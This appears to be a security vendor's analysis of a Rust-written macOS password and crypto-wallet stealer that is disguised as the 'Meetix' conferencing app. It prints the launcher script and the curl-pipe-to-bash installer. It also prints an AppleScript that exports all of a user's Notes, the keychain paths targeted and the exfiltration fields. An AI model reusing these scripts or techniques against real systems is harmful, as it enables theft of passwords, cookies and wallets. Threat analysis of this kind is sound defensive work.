Mac.PWS.JobStealer.1

SHA1 hashes:

• f0b8ef7ba2dc9dcc6156ed5d26964798bbf5d29e (MeetLabs.dmg — a .dmg disk image)
• 213407de0ea5f352e2ab66cdb91e7e633c54cd1c (installer — the trojan’s executable file)

Obfuscator: Rust OLLVM (indirect global variable)

Description

A malicious program designed for computers running macOS. It steals various kinds information from infected devices, including logins and passwords saved in web browsers; cookie files; and data from crypto wallets. Threat actors disguise this trojan app as online video conferencing software and distribute it via malicious sites.

Mac.PWS.JobStealer.1 is written in the Rust programming language. The trojan’s code is obfuscated using Rust OLLVM, which makes it more difficult to analyze. In addition, the Foreign Function Interface (or FFI) for Objective-C is actively used in the trojan, which allows Mac.PWS.JobStealer.1 to create phishing windows and run OSA scripts.

Operating routine

Distribution

Mac.PWS.JobStealer.1 can be downloaded from malicious websites in two formats:

• as a .dmg disk image containing the trojan’s executable file and the script for launching it;
• as an executable file directly.

In the first case, when instaled from the DMG image, the script assigns the necessary attributes to the trojan executable file and runs it:

DIR="$(cd "$(dirname "$0")" && pwd)"
APP_NAME="installer"
APP_PATH="$DIR/.back/$APP_NAME"
TEMP_APP="/tmp/$APP_NAME"
rm -rf "$TEMP_APP"
cp -r "$APP_PATH" "$TEMP_APP"
xattr -c "$TEMP_APP"
chmod +x "$TEMP_APP"
clear
nohup /tmp/installer &>/dev/null &
clear

In the second case, the malicious actors provide the following type of bash command: curl -s hxxps[:]//macos[.]meetix[.]app/install | nohup bash &. They ask the user to copy it and run it in the terminal. When the command is executed, a script is loaded from the website, and that script downloads and launches Mac.PWS.JobStealer.1’s executable file:

#!/usr/bin/env bash
SOFT_NAME="Meetix"
INSTALL_DIR="/usr/local/bin"
DOWN_URL="hxxps[:]//macos[.]meetix[.]app/installer"
echo "Installing the app..."
TMP_FILE=$(mktemp)
trap 'rm -f "$TMP_FILE"' EXIT
curl -fsSL "$DOWN_URL" -o "$TMP_FILE"
chmod +x "$TMP_FILE"
"$TMP_FILE" > /dev/null

Execution

When launched, Mac.PWS.JobStealer.1 decrypts the URL hxxps[:]//526eff9f8bb7aafd7117ca5e33a6a183@o4509139651198976[.]ingest[.]de[.]sentry[.]io/4509422649213008, which leads to a legitimate service for monitoring app activity. If this URL is missing, or an error occurs while it is being processed, Mac.PWS.JobStealer.1 attempts to obtain another URL from the variable SENTRY_DSN.

Regardless of the result of processing the target URL, the malicious program checks the environment for the following variables: SENTRY_RELEASE, SENTRY_ENVIRONMENT, HTTP_PROXY, HTTPS_PROXY, and SSL_VERIFY.

The trojan actively uses the Objective-C functions to work with the Core Foundation objects. In particular, a Cacao application is created using the sharedApplication() method of the RSTApplication class.

Mac.PWS.JobStealer.1 uses the Rust programming language method https://github.com/apache/teaclave-sgx-sdk/blob/b635249a1cbf55d5eb15819b4578827f2a27d8a0/sgx_sync/src/once.rs#L150 to call a function that sets up callbacks to the main states of the created Cacao app’s lifecycle. The core trojan functionality is linked with the state applicationDidFinishLaunching:. When the app enters this state, the trojan proceeds to execute its primary malicious tasks.

1. The trojan obtains information about the OS version and the UUID of the infected computer by running the command ioreg -rd1 -c IOPlatformExpertDevice via the ZSH shell (Z shell).

2. It tries to connect to the C2 server hxxps[:]//cloudproxy[.]link/m/opened. If it fails, the trojan displays a window with the text Cannot connect to the server. Please reinstall or use VPN..

3. It displays a window asking for the Mac user’s account password. If the password is incorrect, the trojan app is executed in the mode force_mode.

4. It copies the files /Users/%USERNAME%/Library/Keychains/login.keychain-db and /Library/Keychains/login.keychain.

5. It attempts to access Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, and CocCoc browser data using the following parameters: browser name, browser name in the process list, and the storage name.

Next, it goes through the list of target browsers and finds the following data:

• Cookies (for this, the trojan uses the code https://github.com/hakaioffsec/browservoyage/blob/main/src/chrome/macos.rs#L329).
• Crypto wallet browser extensions. First it tries to locate the extension with the ID hnfanknocfeofbddgcijnmhnfnkdnaad, which is the Coinbase Wallet. It also has an encrypted list of other wallets, consisting of 298 positions (listed below).
• Bank card data saved in the autofill list (for this, it uses code based on https://github.com/lusca0x01/MaldevTechniques/blob/9d5bd787a749017c73d275899e89685bbaaae46e/SRIS/src/browser/database.rs#L144).
• Passwords saved in the autofill list.

6. It obtains an external IP address by accessing hxxps[:]//freeipapi[.]com/api/json.

7. It collects information about the operating system.

8. It collects Telegram messenger files located at /Library/Application Support/Telegram Desktop/tdata and /Documents/temp_data/Apps/Telegram.

9. It runs an OSA script that accesses all of the user’s notes from the default macOS Notes application and saves them to a file. This script looks like this:

tell application "Notes"
    repeat with theAccount in accounts
        repeat with theFolder in folders of theAccount
            repeat with theNote in notes of theFolder
                set noteTitle to name of theNote
                if noteTitle is "" then set noteTitle to "Untitled"
                set safeTitle to do shell script "echo " & quoted form of noteTitle & " | tr -cd '[:alnum:] _-'"
                set filePath to "/" & safeTitle & ".txt"
                set noteBody to body of theNote
                set fileRef to open for access filePath with write permission
                set eof of fileRef to 0
                write noteBody to fileRef
                close access fileRef
            end repeat
        end repeat
    end repeat
end tell

10. It checks whether the directories /Applications/Ledger Live.app and /Applications/Trezor Suite.app are present to determine whether the crypto wallets Ledger Live and Trezor Suite are installed in the system. The trojan does not copy these wallets’ data and only informs the C2 server about their presence.

11. It archives collected data into a ZIP file which then uploads to the C2 server at hxxps[:]//cloudproxy[.]link/m/opened.

12. It forms a JSON containing the information about the collected data and uploads it to sentry[.]io.

The structure of this JSON is as follows:

• 'ip':   ,    — the field ipAddress from the response hxxps[:]//freeipapi[.]com/api/json;
• 'geo':   ,    — the field countryName from the response hxxps[:]//freeipapi[.]com/api/json;
• 'build_name':   ,    — the value 'N9T' hardcoded in the trojan’s code;
• 'build_version':   ,    — the value '9.9.10' hardcoded in the trojan’s code;
• 'filename':   ,    — the result of the function _NSGetExecutablePath() execution;
• 'pers_password':   ,    — the Mac user account password obtained with the phishing window implemented in the function rst_phish_lpe;
• 'passwords':   ,    — the number of passwords extracted from the browsers;
• 'cookies':   ,    — the number of cookie files extracted from the browsers;
• 'wallets':   ,    — the number of dumps extracted from the browsers containing data from crypto wallet extensions;
• 'credits':   ,    — the amount of bank card data extracted from the browsers;
• 'is_vm':   ,    — the value True is always specified;
• 'hardwares':   ,    — the strings Trezor and Ledger, separated by commas, are specified if the corresponding apps are present;
• 'force_mode': — the mode in which the password typed into the phishing window by the user is incorrect. In this case, the field pers_password remains empty.

The list of target crypto wallet extensions

The encrypted list of crypto wallet browser extensions whose data Mac.PWS.JobStealer.1 tries to extract:

Indicators of compromise
News about the trojan